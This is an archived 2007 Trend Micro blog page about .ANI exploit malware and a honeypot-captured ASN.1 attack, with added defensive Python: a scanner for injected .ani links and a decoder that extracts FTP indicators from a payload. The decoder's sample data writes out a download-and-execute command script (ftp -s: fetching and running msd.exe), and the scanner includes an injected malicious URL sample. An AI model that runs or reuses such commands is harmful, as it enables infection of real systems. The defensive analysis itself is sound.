
Archive for April 3rd, 2007


April 3, 2007
by Paul Oliveria (Technical Communications)

Perhaps due to the increasing number of reports of malware taking advantage of this recently exploited Windows vulnerability, Microsoft is set to release a security patch this Tuesday, April 3.

Normally, Microsoft releases its monthly security bulletins every second Tuesday of the month (aka “Patch Tuesday”). Tomorrow’s release is thus considered an out-of-cycle release. Note that Microsoft’s last out-of-cycle release happened last September for the Vector Markup Language (VML) vulnerability.

Among the malware already reported to be exploiting this .ANI vulnerability is TROJ_ANICMOO.AX, which was discussed in this blog entry. More recently, TrendLabs has detected PE_FUBALCA.A-O, a file infector that targets Web site-related files (HTML, JSP, ASP, etc.) and injects into them a URL pointing to .ANI exploit code.

Trend Micro already protects users against similar exploits with the generic detection pattern EXPL_ANICMOO.GEN. However, as always, users are still advised to download and install the security patch as soon as it is released.

 
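A Web site administrator checking whether an infector of the kind described above has touched their content files would look for newly added references to .ANI resources hosted elsewhere. The following Python is an added example, not code from the post or from Trend Micro: it scans a set of web files for .ani URLs reached through CSS url(), href= or src= and reports those pointing to a host other than the site's own. The site host, the file-type list and the sample pages are constructed assumptions; the post itself does not state how the injected URL appears in the file.

```python
import re
from urllib.parse import urlparse

# Constructed sample pages, not content from the post. The site's own host is
# an assumption used to tell local cursor files from references to other hosts.
SITE_HOST = "www.example.com"
SAMPLE_FILES = {
    "index.html": '<html><body style="cursor: url(/img/pointer.ani)">Welcome</body></html>',
    "news.asp": (
        "<html><head><style>body{cursor:url(http://bad.example.net/x/y.ani)}</style></head>"
        "<body>News</body></html>"
    ),
    "faq.jsp": '<html><body><a href="http://partner.example.org/">Partner</a></body></html>',
    "notes.txt": "cursor: url(http://bad.example.net/x/y.ani)",  # not a web file, skipped
}

# File types the infector described in the post goes after (the list is an assumption).
WEB_EXTENSIONS = (".html", ".htm", ".jsp", ".asp", ".aspx", ".php")

# An .ani reference reached through CSS url(), href= or src=, terminated by a
# quote, bracket, whitespace, '>' or end of text.
_ANI_REF = re.compile(
    r"""(?:url\(\s*|href=\s*|src=\s*)["']?([^"'()\s>]+\.ani)(?=["'()\s>]|$)""",
    re.IGNORECASE,
)


def find_ani_references(content: str) -> list:
    """Return every .ani URL referenced in one file's content."""
    return _ANI_REF.findall(content)


def is_external(ref: str, site_host: str) -> bool:
    """True when the reference names a host other than the site itself."""
    host = urlparse(ref).hostname  # None for relative paths such as /img/pointer.ani
    return host is not None and host.lower() != site_host.lower()


def scan_files(files: dict, site_host: str) -> list:
    """Report (filename, url) for each web file that references an .ani on another host."""
    hits = []
    for name, content in files.items():
        if not name.lower().endswith(WEB_EXTENSIONS):
            continue
        for ref in find_ani_references(content):
            if is_external(ref, site_host):
                hits.append((name, ref))
    return hits


if __name__ == "__main__":
    for name, url in scan_files(SAMPLE_FILES, SITE_HOST):
        print(f"{name}: external .ani reference {url}")
```

In a real deployment the dictionary would be replaced by a walk over the document root, and a hit is a prompt to compare the file against a known-good copy rather than proof of infection on its own: a legitimately hosted cursor on a CDN would trip the same check.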

April 3, 2007
by Jonell Baltazar (Advanced Threats Researcher)

It’s been a while since I got an interesting packet capture from one of our honeypots. The honeypot intercepted a packet exploiting MS04-007, the ASN.1 vulnerability. As far as I can remember, this attack was first seen in June 2005, and we have the detections WORM_RBOT.BJF and WORM_RBOT.BJI. Note that this vulnerability is directly related to HTTP on port 80, so this attack can bypass firewalls and is considered a web threat. The image below shows the first few bytes of the packet.

[Image: asn1.JPG, the first few bytes of the captured packet]

The data is base64-encoded, so we must decode it to see its payload.

[Image: payload.JPG, the decoded payload]

The packet tries to download and execute two binaries (msd.exe and wuauclt10.exe) via FTP from two different IP addresses. I was able to get a copy of the first downloaded binary but failed to obtain the second. The binary file, msd.exe, is related to the WORM_RBOT family and has already been submitted to the Service team for the necessary solutions. Now I have come to realize that there are still unpatched machines connected to the Internet that become zombies for malware authors. If only the necessary security patch were applied, this attack would be prevented and would be of no use to malware authors. As a friendly reminder, please apply security patches to your systems to be secure from known attacks such as the one mentioned in this entry.

Update: This is to be detected as WORM_RBOT.DLC.

 
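The triage step the post describes, decoding the base64 body of a captured request and reading off where the payload fetches its binaries from, is easy to script so that the indicators come out in a fixed shape. The following Python is an added example, not code from the post or from Trend Micro: it decodes base64 text lifted from a capture (tolerating line wrapping and stripped padding) and extracts the FTP servers, fetched file names and executed names from the resulting command script. The sample script is constructed in the shape such bots commonly use (echoed FTP commands followed by `ftp -s:`), with RFC 5737 documentation addresses; it is not the bytes from the post's capture.

```python
import base64
import re

# Constructed sample, not the bytes from the post's capture. Bots of this family
# commonly drop an FTP command script with "echo ... >> file", run "ftp -s:file"
# and then execute what was fetched; the addresses are RFC 5737 documentation ranges.
SAMPLE_SCRIPT = (
    "echo open 192.0.2.10 > o.txt\r\n"
    "echo user anonymous anon@ >> o.txt\r\n"
    "echo get msd.exe >> o.txt\r\n"
    "echo bye >> o.txt\r\n"
    "ftp -s:o.txt\r\n"
    "msd.exe\r\n"
    "echo open 198.51.100.7 > p.txt\r\n"
    "echo user anonymous anon@ >> p.txt\r\n"
    "echo get wuauclt10.exe >> p.txt\r\n"
    "echo bye >> p.txt\r\n"
    "ftp -s:p.txt\r\n"
    "wuauclt10.exe\r\n"
)
# What the body would look like in the capture: the script, base64-encoded.
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("latin-1")).decode("ascii")

_B64_JUNK = re.compile(r"[^A-Za-z0-9+/=]")
_IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
_OPEN = re.compile(rf"\bopen\s+({_IPV4})(?:\s+\d+)?", re.IGNORECASE)   # ftp "open host [port]"
_GET = re.compile(r"\bget\s+(\S+)", re.IGNORECASE)                      # ftp "get file"
_EXEC = re.compile(r"^\s*([\w.-]+\.exe)\s*$", re.IGNORECASE)            # a bare "name.exe" line


def decode_payload(captured: str) -> bytes:
    """Decode base64 text copied from a capture; tolerates line breaks and lost padding."""
    cleaned = _B64_JUNK.sub("", captured).rstrip("=")
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True)


def extract_indicators(decoded: bytes) -> dict:
    """Pull FTP servers, fetched files and executed names out of a decoded command script."""
    text = decoded.decode("latin-1")  # every byte maps to a char; any shellcode bytes become noise
    servers, downloads, executed = [], [], []
    current = None
    for line in text.splitlines():
        m = _OPEN.search(line)
        if m:
            current = m.group(1)
            if current not in servers:
                servers.append(current)
            continue
        m = _GET.search(line)
        if m and current:
            downloads.append((current, m.group(1)))
            continue
        m = _EXEC.match(line)
        if m:
            executed.append(m.group(1))
    return {"servers": servers, "downloads": downloads, "executed": executed}


if __name__ == "__main__":
    result = extract_indicators(decode_payload(SAMPLE_B64))
    for server, filename in result["downloads"]:
        print(f"fetches {filename} from {server}")
    print("executes:", ", ".join(result["executed"]))
```

The server and file pairs are exactly what gets handed on for blocking and sample collection; decoding as latin-1 rather than UTF-8 matters because a real body mixes a binary exploit prefix with the ASCII script, and a strict decoder would stop at the first non-UTF-8 byte.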


© Copyright 2008 Trend Micro Inc. All rights reserved.